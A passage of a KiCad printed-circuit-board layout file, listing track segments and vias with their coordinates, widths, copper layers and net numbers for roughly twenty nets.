(segment (start 70.2 80) (end 72.28418 80) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC218) (status 10))
(segment (start 73.825 88) (end 75.025 86.8) (width 0.381) (layer F.Cu) (net 1) (status 20))
(segment (start 70.2 88) (end 73.825 88) (width 0.381) (layer F.Cu) (net 1) (status 10))
(via (at 76.46 86.82) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 1))
(segment (start 76.44 86.8) (end 76.46 86.82) (width 0.381) (layer F.Cu) (net 1))
(segment (start 75.025 86.8) (end 76.44 86.8) (width 0.381) (layer F.Cu) (net 1) (status 10))
(segment (start 76.46 86.82) (end 76.46 90.01582) (width 0.381) (layer F.Cu) (net 1))
(segment (start 76.46 80.79) (end 76.46 86.82) (width 0.381) (layer B.Cu) (net 1))
(segment (start 75.61531 90.89051) (end 76.46 90.04582) (width 0.381) (layer F.Cu) (net 1))
(segment (start 76.46 90.04582) (end 76.46 86.82) (width 0.381) (layer F.Cu) (net 1))
(segment (start 61.86949 90.89051) (end 75.61531 90.89051) (width 0.381) (layer F.Cu) (net 1))
(segment (start 61.330164 91.429836) (end 61.86949 90.89051) (width 0.381) (layer F.Cu) (net 1))
(segment (start 56.185 89.39) (end 56.61 89.39) (width 0.381) (layer F.Cu) (net 1))
(segment (start 57.669 81.6) (end 57.659499 81.590499) (width 0.381) (layer F.Cu) (net 1))
(segment (start 58.8 81.6) (end 57.669 81.6) (width 0.381) (layer F.Cu) (net 1) (status 10))
(segment (start 57.659499 78.064499) (end 55.595 76) (width 0.381) (layer F.Cu) (net 1) (status 20))
(segment (start 57.659499 81.590499) (end 57.659499 78.064499) (width 0.381) (layer F.Cu) (net 1))
(via (at 55.56 77.52) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 1))
(segment (start 55.49 77.59) (end 55.56 77.52) (width 0.381) (layer B.Cu) (net 1))
(segment (start 59.920164 91.429836) (end 58.811599 91.429836) (width 0.381) (layer F.Cu) (net 1))
(segment (start 59.689836 91.429836) (end 59.920164 91.429836) (width 0.381) (layer F.Cu) (net 1))
(segment (start 59.920164 91.429836) (end 61.330164 91.429836) (width 0.381) (layer F.Cu) (net 1))
(segment (start 58.80261 91.428452) (end 58.212079 90.837921) (width 0.381) (layer F.Cu) (net 1))
(segment (start 58.811599 91.429836) (end 58.80261 91.428452) (width 0.381) (layer F.Cu) (net 1))
(segment (start 59.050501 90.840501) (end 57.6 89.39) (width 0.381) (layer F.Cu) (net 1))
(segment (start 61.087401 90.840501) (end 59.050501 90.840501) (width 0.381) (layer F.Cu) (net 1))
(segment (start 61.3 89.7) (end 61.3 90.627902) (width 0.381) (layer F.Cu) (net 1) (status 10))
(segment (start 57.6 89.39) (end 56.61 89.39) (width 0.381) (layer F.Cu) (net 1))
(segment (start 61.3 90.627902) (end 61.087401 90.840501) (width 0.381) (layer F.Cu) (net 1))
(segment (start 55.525 89.39) (end 56.61 89.39) (width 0.381) (layer F.Cu) (net 1) (status 10))
(segment (start 55.525 89.885) (end 56.477921 90.837921) (width 0.381) (layer F.Cu) (net 1) (status 10))
(segment (start 55.525 89.39) (end 55.525 89.885) (width 0.381) (layer F.Cu) (net 1) (status 30))
(segment (start 58.212079 90.837921) (end 56.477921 90.837921) (width 0.381) (layer F.Cu) (net 1))
(segment (start 62.05 75.095) (end 62.115 75.095) (width 0.381) (layer F.Cu) (net 1) (status 30))
(segment (start 117.97 73.975) (end 120.4 73.975) (width 0.381) (layer F.Cu) (net 1) (status 30))
(segment (start 117.68 73.685) (end 117.97 73.975) (width 0.381) (layer F.Cu) (net 1) (status 30))
(segment (start 117.68 71) (end 117.68 73.685) (width 0.381) (layer F.Cu) (net 1) (status 30))
(via (at 60.51 76.032957) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 1))
(segment (start 61.447957 75.095) (end 60.51 76.032957) (width 0.381) (layer F.Cu) (net 1) (status 10))
(segment (start 62.05 75.095) (end 61.447957 75.095) (width 0.381) (layer F.Cu) (net 1) (status 30))
(via (at 63.18 76.03) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 1))
(segment (start 62.05 75.095) (end 62.539203 75.095) (width 0.381) (layer F.Cu) (net 1) (status 30))
(segment (start 57.047043 76.032957) (end 55.56 77.52) (width 0.381) (layer B.Cu) (net 1))
(segment (start 60.51 76.032957) (end 57.047043 76.032957) (width 0.381) (layer B.Cu) (net 1))
(segment (start 63.260674 76.110674) (end 63.18 76.03) (width 0.381) (layer B.Cu) (net 1))
(segment (start 62.245 75.095) (end 63.18 76.03) (width 0.381) (layer F.Cu) (net 1) (status 10))
(segment (start 62.05 75.095) (end 62.245 75.095) (width 0.381) (layer F.Cu) (net 1) (status 30))
(segment (start 63.7 76.55) (end 63.7 78.3) (width 0.381) (layer F.Cu) (net 1) (status 20))
(segment (start 63.18 76.03) (end 63.7 76.55) (width 0.381) (layer F.Cu) (net 1))
(segment (start 71.163673 79.19451) (end 71.709655 78.648528) (width 0.381) (layer F.Cu) (net 1))
(segment (start 69.333392 79.19451) (end 71.163673 79.19451) (width 0.381) (layer F.Cu) (net 1))
(segment (start 121.49051 78.206875) (end 121.49051 75.43469) (width 0.381) (layer F.Cu) (net 1))
(segment (start 75.828528 78.648528) (end 71.709655 78.648528) (width 0.381) (layer F.Cu) (net 1))
(segment (start 76.46 79.28) (end 75.828528 78.648528) (width 0.381) (layer F.Cu) (net 1))
(segment (start 76.46 80.79) (end 76.46 79.28) (width 0.381) (layer F.Cu) (net 1))
(segment (start 71.7 76.03) (end 76.46 80.79) (width 0.381) (layer B.Cu) (net 1))
(segment (start 63.18 76.03) (end 71.7 76.03) (width 0.381) (layer B.Cu) (net 1))
(segment (start 121.49051 75.06551) (end 120.4 73.975) (width 0.381) (layer F.Cu) (net 1))
(segment (start 121.49051 81.69049) (end 121.49051 75.06551) (width 0.381) (layer F.Cu) (net 1))
(segment (start 120.181 83) (end 121.49051 81.69049) (width 0.381) (layer F.Cu) (net 1))
(segment (start 118.8 83) (end 120.181 83) (width 0.381) (layer F.Cu) (net 1))
(segment (start 117.41 81.61) (end 118.8 83) (width 0.381) (layer F.Cu) (net 1))
(segment (start 117.290501 81.490501) (end 117.41 81.61) (width 0.381) (layer F.Cu) (net 1))
(segment (start 100.118939 81.490501) (end 117.290501 81.490501) (width 0.381) (layer F.Cu) (net 1))
(segment (start 97.276968 78.648528) (end 100.118939 81.490501) (width 0.381) (layer F.Cu) (net 1))
(segment (start 75.828528 78.648528) (end 97.276968 78.648528) (width 0.381) (layer F.Cu) (net 1))
(segment (start 55.34 86.525) (end 55.655 86.84) (width 0.254) (layer F.Cu) (net 2) (tstamp 5EDCC1BB) (status 30))
(segment (start 55.4 84) (end 55.35 84.05) (width 0.254) (layer F.Cu) (net 2) (status 30))
(segment (start 58.8 84) (end 55.9 84) (width 0.254) (layer F.Cu) (net 2) (status 30))
(segment (start 55.525 84.225) (end 55.35 84.05) (width 0.254) (layer F.Cu) (net 2) (status 30))
(segment (start 55.525 86.84) (end 55.525 84.225) (width 0.254) (layer F.Cu) (net 2) (status 30))
(segment (start 114.404499 64.022599) (end 114.482599 63.944499) (width 0.381) (layer F.Cu) (net 3))
(segment (start 114.404499 64.900501) (end 114.404499 64.022599) (width 0.381) (layer F.Cu) (net 3) (status 10))
(segment (start 114.245 65.06) (end 114.404499 64.900501) (width 0.381) (layer F.Cu) (net 3) (status 30))
(segment (start 118.985501 64.900501) (end 119.145 65.06) (width 0.381) (layer F.Cu) (net 3) (status 30))
(segment (start 118.453391 63.490489) (end 118.985501 64.022599) (width 0.381) (layer F.Cu) (net 3))
(segment (start 114.936609 63.490489) (end 118.453391 63.490489) (width 0.381) (layer F.Cu) (net 3))
(segment (start 118.985501 64.022599) (end 118.985501 64.900501) (width 0.381) (layer F.Cu) (net 3) (status 20))
(segment (start 114.404499 64.022599) (end 114.936609 63.490489) (width 0.381) (layer F.Cu) (net 3))
(segment (start 119.145 65.515) (end 119.19051 65.56051) (width 0.381) (layer F.Cu) (net 3) (status 30))
(segment (start 119.145 65.06) (end 119.145 65.515) (width 0.381) (layer F.Cu) (net 3) (status 30))
(segment (start 119.19051 65.10551) (end 119.145 65.06) (width 0.381) (layer F.Cu) (net 3) (status 30))
(segment (start 119.44051 69.96051) (end 120.48 71) (width 0.381) (layer F.Cu) (net 3) (status 20))
(segment (start 119.44051 67.28469) (end 119.44051 69.96051) (width 0.381) (layer F.Cu) (net 3))
(segment (start 119.145 66.98918) (end 119.44051 67.28469) (width 0.381) (layer F.Cu) (net 3))
(segment (start 119.145 65.06) (end 119.145 66.98918) (width 0.381) (layer F.Cu) (net 3) (status 10))
(segment (start 64.5 75.095) (end 64.5 78.3) (width 0.254) (layer F.Cu) (net 4) (tstamp 5EDCC353) (status 30))
(segment (start 96.958499 53.858499) (end 99 55.9) (width 0.254) (layer B.Cu) (net 5) (status 20))
(segment (start 96.958499 38.941501) (end 96.958499 53.858499) (width 0.254) (layer B.Cu) (net 5))
(segment (start 99 36.9) (end 96.958499 38.941501) (width 0.254) (layer B.Cu) (net 5) (status 10))
(segment (start 96.958499 72.858499) (end 99 74.9) (width 0.254) (layer B.Cu) (net 5) (status 20))
(segment (start 96.958499 57.941501) (end 96.958499 72.858499) (width 0.254) (layer B.Cu) (net 5))
(segment (start 99 55.9) (end 96.958499 57.941501) (width 0.254) (layer B.Cu) (net 5) (status 10))
(segment (start 107.05 82.95) (end 107.05 100.10955) (width 0.254) (layer B.Cu) (net 5) (status 20))
(segment (start 99 74.9) (end 107.05 82.95) (width 0.254) (layer B.Cu) (net 5) (status 10))
(via (at 66.416908 88.346122) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 5))
(segment (start 105.172817 98.232367) (end 107.05 100.10955) (width 0.254) (layer B.Cu) (net 5) (status 20))
(segment (start 90.018731 98.232367) (end 105.172817 98.232367) (width 0.254) (layer B.Cu) (net 5))
(segment (start 84.840685 93.054321) (end 90.018731 98.232367) (width 0.254) (layer B.Cu) (net 5))
(segment (start 71.125107 93.054321) (end 84.840685 93.054321) (width 0.254) (layer B.Cu) (net 5))
(segment (start 66.416908 88.346122) (end 71.125107 93.054321) (width 0.254) (layer B.Cu) (net 5))
(segment (start 66.1 88.66303) (end 66.416908 88.346122) (width 0.254) (layer F.Cu) (net 5))
(segment (start 66.1 89.7) (end 66.1 88.66303) (width 0.254) (layer F.Cu) (net 5))
(segment (start 117.945 65.225) (end 117.967999 65.247999) (width 0.254) (layer F.Cu) (net 6) (status 30))
(segment (start 117.945 65.06) (end 117.945 65.225) (width 0.254) (layer F.Cu) (net 6) (status 30))
(segment (start 117.945 67.47) (end 118.475 68) (width 0.254) (layer F.Cu) (net 6) (status 30))
(segment (start 117.945 65.06) (end 117.945 67.47) (width 0.254) (layer F.Cu) (net 6) (status 30))
(segment (start 117.445 64.0504) (end 117.445 65.06) (width 0.254) (layer F.Cu) (net 7) (status 20))
(segment (start 116.518001 64.007999) (end 117.402599 64.007999) (width 0.254) (layer F.Cu) (net 7))
(segment (start 116.445 64.081) (end 116.518001 64.007999) (width 0.254) (layer F.Cu) (net 7))
(segment (start 117.402599 64.007999) (end 117.445 64.0504) (width 0.254) (layer F.Cu) (net 7))
(segment (start 116.445 65.06) (end 116.445 64.081) (width 0.254) (layer F.Cu) (net 7) (status 10))
(segment (start 115.53 69.728085) (end 115.53 73.975) (width 0.254) (layer F.Cu) (net 7) (status 20))
(segment (start 117.445 67.813085) (end 115.53 69.728085) (width 0.254) (layer F.Cu) (net 7))
(segment (start 117.445 65.06) (end 117.445 67.813085) (width 0.254) (layer F.Cu) (net 7) (status 10))
(segment (start 115.945 66.023602) (end 115.945 65.06) (width 0.254) (layer F.Cu) (net 8) (status 20))
(segment (start 116.945 65.06) (end 116.945 66.023602) (width 0.254) (layer F.Cu) (net 8) (status 10))
(segment (start 116.856601 66.112001) (end 116.945 66.023602) (width 0.254) (layer F.Cu) (net 8))
(segment (start 115.945 66.023602) (end 116.033399 66.112001) (width 0.254) (layer F.Cu) (net 8))
(segment (start 116.172001 66.112001) (end 116.17701 66.11701) (width 0.254) (layer F.Cu) (net 8))
(segment (start 116.033399 66.112001) (end 116.172001 66.112001) (width 0.254) (layer F.Cu) (net 8))
(segment (start 116.172001 66.112001) (end 116.856601 66.112001) (width 0.254) (layer F.Cu) (net 8))
(segment (start 115.945 65.06) (end 115.945 68.671018) (width 0.254) (layer F.Cu) (net 8) (status 10))
(segment (start 113.1 71.516019) (end 113.1 73.975) (width 0.254) (layer F.Cu) (net 8) (status 20))
(segment (start 115.945 68.671019) (end 113.1 71.516019) (width 0.254) (layer F.Cu) (net 8))
(segment (start 115.945 65.06) (end 115.945 68.671019) (width 0.254) (layer F.Cu) (net 8) (status 10))
(segment (start 114.945 65.915) (end 114.945 65.06) (width 0.254) (layer F.Cu) (net 9) (status 20))
(segment (start 115.275 68) (end 114.945 67.67) (width 0.254) (layer F.Cu) (net 9) (status 30))
(segment (start 114.945 67.92) (end 115.025 68) (width 0.254) (layer F.Cu) (net 9) (status 30))
(segment (start 114.945 65.06) (end 114.945 67.92) (width 0.254) (layer F.Cu) (net 9) (status 30))
(via (at 70.784232 78.404009) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 10) (tstamp 5EDCC1A9))
(via (at 63.6 85.59) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 10))
(segment (start 120.250962 76.025) (end 120.4 76.025) (width 0.254) (layer F.Cu) (net 10))
(via (at 120.38 77.23) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 10))
(segment (start 120.4 77.21) (end 120.38 77.23) (width 0.254) (layer F.Cu) (net 10))
(segment (start 120.4 76.025) (end 120.4 77.21) (width 0.254) (layer F.Cu) (net 10))
(segment (start 115.8 81.81) (end 115.8 83) (width 0.254) (layer B.Cu) (net 10))
(segment (start 120.38 77.23) (end 115.8 81.81) (width 0.254) (layer B.Cu) (net 10))
(segment (start 116.505 79.92) (end 117.6925 78.7325) (width 0.254) (layer F.Cu) (net 10))
(segment (start 113.15 79.92) (end 116.505 79.92) (width 0.254) (layer F.Cu) (net 10))
(segment (start 112.985967 80.084033) (end 113.15 79.92) (width 0.254) (layer F.Cu) (net 10))
(segment (start 98.44 79.079688) (end 98.44 79.079692) (width 0.254) (layer F.Cu) (net 10))
(segment (start 112.118067 80.94) (end 112.974033 80.084033) (width 0.254) (layer F.Cu) (net 10))
(segment (start 70.918982 78.131018) (end 97.49133 78.131018) (width 0.254) (layer F.Cu) (net 10))
(segment (start 117.6925 78.7325) (end 120.4 76.025) (width 0.254) (layer F.Cu) (net 10))
(segment (start 100.300308 80.94) (end 112.118067 80.94) (width 0.254) (layer F.Cu) (net 10))
(segment (start 98.44 79.079692) (end 100.300308 80.94) (width 0.254) (layer F.Cu) (net 10))
(segment (start 97.49133 78.131018) (end 98.44 79.079688) (width 0.254) (layer F.Cu) (net 10))
(segment (start 70.784232 78.265768) (end 70.918982 78.131018) (width 0.254) (layer F.Cu) (net 10))
(segment (start 112.974033 80.084033) (end 112.985967 80.084033) (width 0.254) (layer F.Cu) (net 10))
(segment (start 70.784232 78.404009) (end 70.784232 78.265768) (width 0.254) (layer F.Cu) (net 10))
(segment (start 63.59 85.6) (end 63.6 85.59) (width 0.254) (layer F.Cu) (net 10))
(segment (start 58.8 85.6) (end 63.59 85.6) (width 0.254) (layer F.Cu) (net 10))
(segment (start 70.784232 78.405768) (end 70.784232 78.404009) (width 0.254) (layer B.Cu) (net 10))
(segment (start 63.6 85.59) (end 70.784232 78.405768) (width 0.254) (layer B.Cu) (net 10))
(segment (start 111.8 83) (end 111.37 83) (width 0.254) (layer F.Cu) (net 11) (status 30))
(via (at 69.375002 78.05) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 11) (tstamp 5EDCC293))
(segment (start 69.375002 78.05) (end 69.375002 78.024998) (width 0.254) (layer F.Cu) (net 11) (tstamp 5EDCC335))
(via (at 62.784833 84.814833) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 11))
(segment (start 112.175962 83) (end 111.8 83) (width 0.254) (layer F.Cu) (net 11) (status 30))
(via (at 117.97 77.23) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 11))
(segment (start 117.97 76.025) (end 117.97 77.23) (width 0.254) (layer F.Cu) (net 11))
(segment (start 112.2 83) (end 111.8 83) (width 0.254) (layer B.Cu) (net 11))
(segment (start 117.97 77.23) (end 112.2 83) (width 0.254) (layer B.Cu) (net 11))
(segment (start 100.437406 80.43503) (end 111.980972 80.435029) (width 0.254) (layer F.Cu) (net 11))
(segment (start 97.679386 77.677008) (end 100.437406 80.43503) (width 0.254) (layer F.Cu) (net 11))
(segment (start 69.747994 77.677008) (end 97.679386 77.677008) (width 0.254) (layer F.Cu) (net 11))
(segment (start 69.375002 78.05) (end 69.747994 77.677008) (width 0.254) (layer F.Cu) (net 11))
(segment (start 112.583 79.833) (end 112.95001 79.46599) (width 0.254) (layer F.Cu) (net 11))
(segment (start 111.980972 80.435029) (end 112.583 79.833) (width 0.254) (layer F.Cu) (net 11))
(segment (start 114.52901 79.46599) (end 115.3025 78.6925) (width 0.254) (layer F.Cu) (net 11))
(segment (start 115.3025 78.6925) (end 117.97 76.025) (width 0.254) (layer F.Cu) (net 11))
(segment (start 112.95001 79.46599) (end 114.52901 79.46599) (width 0.254) (layer F.Cu) (net 11))
(segment (start 114.87599 79.11901) (end 115.3025 78.6925) (width 0.254) (layer F.Cu) (net 11))
(segment (start 62.77 84.8) (end 62.784833 84.814833) (width 0.254) (layer F.Cu) (net 11))
(segment (start 58.8 84.8) (end 62.77 84.8) (width 0.254) (layer F.Cu) (net 11))
(segment (start 62.784833 84.640169) (end 62.784833 84.814833) (width 0.254) (layer B.Cu) (net 11))
(segment (start 69.375002 78.05) (end 62.784833 84.640169) (width 0.254) (layer B.Cu) (net 11))
(segment (start 133.015 73.125) (end 133.69 73.8) (width 0.254) (layer F.Cu) (net 12) (status 10))
(via (at 133.69 73.8) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 12))
(segment (start 132.02 73.125) (end 133.015 73.125) (width 0.254) (layer F.Cu) (net 12) (status 30))
(segment (start 136.2 76.31) (end 136.2 78.4) (width 0.254) (layer B.Cu) (net 12) (status 20))
(segment (start 133.69 73.8) (end 136.2 76.31) (width 0.254) (layer B.Cu) (net 12))
(via (at 133.72 72.8) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 13))
(segment (start 132.775 71.855) (end 133.72 72.8) (width 0.254) (layer F.Cu) (net 13) (status 10))
(segment (start 132.02 71.855) (end 132.775 71.855) (width 0.254) (layer F.Cu) (net 13) (status 30))
(segment (start 139.32 78.4) (end 140.2 78.4) (width 0.254) (layer B.Cu) (net 13) (status 30))
(segment (start 133.72 72.8) (end 139.32 78.4) (width 0.254) (layer B.Cu) (net 13) (status 20))
(segment (start 20.958499 63.858499) (end 23 65.9) (width 0.254) (layer B.Cu) (net 14) (status 20))
(segment (start 20.958499 48.941501) (end 20.958499 63.858499) (width 0.254) (layer B.Cu) (net 14))
(segment (start 23 46.9) (end 20.958499 48.941501) (width 0.254) (layer B.Cu) (net 14) (status 10))
(segment (start 20.958499 82.858499) (end 23 84.9) (width 0.254) (layer B.Cu) (net 14) (status 20))
(segment (start 20.958499 67.941501) (end 20.958499 82.858499) (width 0.254) (layer B.Cu) (net 14))
(segment (start 23 65.9) (end 20.958499 67.941501) (width 0.254) (layer B.Cu) (net 14) (status 10))
(via (at 62.42 88.3) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 14))
(segment (start 32.13 84.9) (end 23 84.9) (width 0.254) (layer B.Cu) (net 14))
(segment (start 35.53 88.3) (end 32.13 84.9) (width 0.254) (layer B.Cu) (net 14))
(segment (start 62.42 88.3) (end 35.53 88.3) (width 0.254) (layer B.Cu) (net 14))
(segment (start 62.9 88.78) (end 62.42 88.3) (width 0.254) (layer F.Cu) (net 14))
(segment (start 62.9 89.7) (end 62.9 88.78) (width 0.254) (layer F.Cu) (net 14))
(segment (start 207.958499 51.858499) (end 210 53.9) (width 0.254) (layer B.Cu) (net 15) (status 20))
(segment (start 207.958499 36.941501) (end 207.958499 51.858499) (width 0.254) (layer B.Cu) (net 15))
(segment (start 210 34.9) (end 207.958499 36.941501) (width 0.254) (layer B.Cu) (net 15) (status 10))
(segment (start 207.958499 70.858499) (end 210 72.9) (width 0.254) (layer B.Cu) (net 15) (status 20))
(segment (start 207.958499 55.941501) (end 207.958499 70.858499) (width 0.254) (layer B.Cu) (net 15))
(segment (start 210 53.9) (end 207.958499 55.941501) (width 0.254) (layer B.Cu) (net 15) (status 10))
(segment (start 183.447011 70.602989) (end 171.167302 70.602989) (width 0.254) (layer F.Cu) (net 15))
(segment (start 151.918954 72.648979) (end 151.653001 72.914933) (width 0.254) (layer F.Cu) (net 15))
(segment (start 151.653001 72.914933) (end 151.203967 73.363967) (width 0.254) (layer F.Cu) (net 15))
(segment (start 151.203967 73.363967) (end 151.013967 73.553967) (width 0.254) (layer F.Cu) (net 15))
(segment (start 170.202989 71.567302) (end 171.167302 70.602989) (width 0.254) (layer F.Cu) (net 15))
(segment (start 169.121313 72.648979) (end 171.167303 70.602989) (width 0.254) (layer F.Cu) (net 15))
(segment (start 151.918954 72.648979) (end 169.121313 72.648979) (width 0.254) (layer F.Cu) (net 15))
(segment (start 171.167302 70.602989) (end 171.542989 70.602989) (width 0.254) (layer F.Cu) (net 15))
(segment (start 171.167303 70.602989) (end 171.542989 70.602989) (width 0.254) (layer F.Cu) (net 15))
(segment (start 203.867933 72.9) (end 210 72.9) (width 0.254) (layer F.Cu) (net 15) (status 20))
(segment (start 196.524932 65.556999) (end 203.867933 72.9) (width 0.254) (layer F.Cu) (net 15))
(segment (start 185.309368 70.602989) (end 190.355358 65.556999) (width 0.254) (layer F.Cu) (net 15))
(segment (start 190.355358 65.556999) (end 196.524932 65.556999) (width 0.254) (layer F.Cu) (net 15))
(segment (start 171.542989 70.602989) (end 185.309368 70.602989) (width 0.254) (layer F.Cu) (net 15))
(segment (start 149.970924 74.597011) (end 151.203967 73.363967) (width 0.254) (layer F.Cu) (net 15))
(segment (start 147.167302 74.597011) (end 149.970924 74.597011) (width 0.254) (layer F.Cu) (net 15))
(segment (start 144.48805 71.917761) (end 147.167302 74.597011) (width 0.254) (layer F.Cu) (net 15))
(segment (start 144.48805 63.08805) (end 144.48805 71.917761) (width 0.254) (layer F.Cu) (net 15))
(segment (start 144.365 62.965) (end 144.48805 63.08805) (width 0.254) (layer F.Cu) (net 15))
(segment (start 141.32 62.965) (end 144.365 62.965) (width 0.254) (layer F.Cu) (net 15) (status 10))
(segment (start 150.958499 53.858499) (end 153 55.9) (width 0.254) (layer B.Cu) (net 16) (status 20))
(segment (start 150.958499 38.941501) (end 150.958499 53.858499) (width 0.254) (layer B.Cu) (net 16))
(segment (start 153 36.9) (end 150.958499 38.941501) (width 0.254) (layer B.Cu) (net 16) (status 10))
(segment (start 150.958499 72.858499) (end 153 74.9) (width 0.254) (layer B.Cu) (net 16) (status 20))
(segment (start 150.958499 57.941501) (end 150.958499 72.858499) (width 0.254) (layer B.Cu) (net 16))
(segment (start 153 55.9) (end 150.958499 57.941501) (width 0.254) (layer B.Cu) (net 16) (status 10))
(segment (start 145.585239 99.474311) (end 144.95 100.10955) (width 0.254) (layer B.Cu) (net 16) (status 30))
(segment (start 145.585239 82.314761) (end 145.585239 99.474311) (width 0.254) (layer B.Cu) (net 16) (status 20))
(segment (start 153 74.9) (end 145.585239 82.314761) (width 0.254) (layer B.Cu) (net 16) (status 10))
(segment (start 151.654424 74.9) (end 153 74.9) (width 0.254) (layer F.Cu) (net 16) (status 20))
(segment (start 150.595384 75.959041) (end 151.654424 74.9) (width 0.254) (layer F.Cu) (net 16))
(segment (start 146.603131 75.959041) (end 150.595384 75.959041) (width 0.254) (layer F.Cu) (net 16))
(segment (start 143.12602 72.48193) (end 146.603131 75.959041) (width 0.254) (layer F.Cu) (net 16))
(segment (start 143.12602 66.94602) (end 143.12602 72.48193) (width 0.254) (layer F.Cu) (net 16))
(segment (start 142.955 66.775) (end 143.12602 66.94602) (width 0.254) (layer F.Cu) (net 16))
(segment (start 141.32 66.775) (end 142.955 66.775) (width 0.254) (layer F.Cu) (net 16) (status 10))
(segment (start 58.958499 45.858499) (end 61 47.9) (width 0.254) (layer B.Cu) (net 17) (status 20))
(segment (start 58.958499 30.941501) (end 58.958499 45.858499) (width 0.254) (layer B.Cu) (net 17))
(segment (start 61 28.9) (end 58.958499 30.941501) (width 0.254) (layer B.Cu) (net 17) (status 10))
(segment (start 58.958499 49.941501) (end 61 47.9) (width 0.254) (layer B.Cu) (net 17) (status 20))
(segment (start 58.958499 64.858499) (end 58.958499 49.941501) (width 0.254) (layer B.Cu) (net 17))
(segment (start 61 66.9) (end 58.958499 64.858499) (width 0.254) (layer B.Cu) (net 17) (status 10))
(via (at 64.418658 88.304301) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 17))
(segment (start 62.015999 67.915999) (end 61 66.9) (width 0.254) (layer B.Cu) (net 17))
(segment (start 62.015999 85.121961) (end 62.015999 67.915999) (width 0.254) (layer B.Cu) (net 17))
(segment (start 64.418658 87.52462) (end 62.015999 85.121961) (width 0.254) (layer B.Cu) (net 17))
(segment (start 64.418658 88.304301) (end 64.418658 87.52462) (width 0.254) (layer B.Cu) (net 17))
(segment (start 64.5 88.385643) (end 64.418658 88.304301) (width 0.254) (layer F.Cu) (net 17))
(segment (start 64.5 89.7) (end 64.5 88.385643) (width 0.254) (layer F.Cu) (net 17))
(segment (start 39.958499 55.941501) (end 42 53.9) (width 0.254) (layer B.Cu) (net 18) (status 20))
(segment (start 39.958499 70.858499) (end 39.958499 55.941501) (width 0.254) (layer B.Cu) (net 18))
(segment (start 39.958499 36.941501) (end 42 34.9) (width 0.254) (layer B.Cu) (net 18) (status 20))
(segment (start 39.958499 51.858499) (end 39.958499 36.941501) (width 0.254) (layer B.Cu) (net 18))
(segment (start 42 53.9) (end 39.958499 51.858499) (width 0.254) (layer B.Cu) (net 18) (status 10))
(segment (start 42 72.9) (end 39.958499 70.858499) (width 0.254) (layer B.Cu) (net 18) (status 10))
(segment (start 42 79.59) (end 42 72.9) (width 0.254) (layer B.Cu) (net 18))
(segment (start 50.25599 87.84599) (end 42 79.59) (width 0.254) (layer B.Cu) (net 18))
(segment (start 61.858981 87.572999) (end 61.58599 87.84599) (width 0.254) (layer B.Cu) (net 18))
(segment (start 61.58599 87.84599) (end 50.25599 87.84599) (width 0.254) (layer B.Cu) (net 18))
(via (at 63.182952 87.317048) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 18))
(segment (start 63.182952 87.98699) (end 63.182952 87.317048) (width 0.254) (layer F.Cu) (net 18))
(segment (start 63.7 88.504038) (end 63.182952 87.98699) (width 0.254) (layer F.Cu) (net 18))
(segment (start 63.7 89.7) (end 63.7 88.504038) (width 0.254) (layer F.Cu) (net 18))
(segment (start 62.114932 87.317048) (end 61.58599 87.84599) (width 0.254) (layer B.Cu) (net 18))
(segment (start 63.182952 87.317048) (end 62.114932 87.317048) (width 0.254) (layer B.Cu) (net 18))
(segment (start 77.958499 51.358499) (end 80 53.4) (width 0.254) (layer B.Cu) (net 19) (status 20))
(segment (start 77.958499 36.441501) (end 77.958499 51.358499) (width 0.254) (layer B.Cu) (net 19))
(segment (start 80 34.4) (end 77.958499 36.441501) (width 0.254) (layer B.Cu) (net 19) (status 10))
(segment (start 77.958499 70.358499) (end 80 72.4) (width 0.254) (layer B.Cu) (net 19) (status 20))
(segment (start 77.958499 55.441501) (end 77.958499 70.358499) (width 0.254) (layer B.Cu) (net 19))
(segment (start 80 53.4) (end 77.958499 55.441501) (width 0.254) (layer B.Cu) (net 19) (status 10))
(segment (start 86.958499 93.184493) (end 87.472968 93.698962) (width 0.254) (layer B.Cu) (net 19) (status 30))
(segment (start 86.958499 79.358499) (end 86.958499 93.184493) (width 0.254) (layer B.Cu) (net 19) (status 20))
(segment (start 80 72.4) (end 86.958499 79.358499) (width 0.254) (layer B.Cu) (net 19) (status 10))
(segment (start 66.765869 87.619121) (end 67.143909 87.997161) (width 0.254) (layer B.Cu) (net 19))
(segment (start 85.028742 92.600311) (end 85.294695 92.866265) (width 0.254) (layer B.Cu) (net 19))
(segment (start 71.313163 92.600311) (end 85.028742 92.600311) (width 0.254) (layer B.Cu) (net 19))
(segment (start 67.143909 88.431057) (end 71.313163 92.600311) (width 0.254) (layer B.Cu) (net 19))
(segment (start 86.127392 93.698962) (end 87.472968 93.698962) (width 0.254) (layer B.Cu) (net 19) (status 20))
(segment (start 85.294695 92.866265) (end 86.127392 93.698962) (width 0.254) (layer B.Cu) (net 19))
(via (at 65.39 87.23) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 19))
(segment (start 66.376748 87.23) (end 65.39 87.23) (width 0.254) (layer B.Cu) (net 19))
(segment (start 67.143909 87.997161) (end 66.376748 87.23) (width 0.254) (layer B.Cu) (net 19))
(segment (start 67.143909 87.997161) (end 67.143909 88.236091) (width 0.254) (layer B.Cu) (net 19))
(segment (start 67.143909 88.236091) (end 67.143909 88.431057) (width 0.254) (layer B.Cu) (net 19))
(segment (start 65.39 89.61) (end 65.3 89.7) (width 0.254) (layer F.Cu) (net 19))
(segment (start 65.39 87.23) (end 65.39 89.61) (width 0.254) (layer F.Cu) (net 19))
(segment (start 169.958499 51.358499) (end 172 53.4) (width 0.254) (layer B.Cu) (net 20) (status 20))
(segment (start 169.958499 36.441501) (end 169.958499 51.358499) (width 0.254) (layer B.Cu) (net 20))
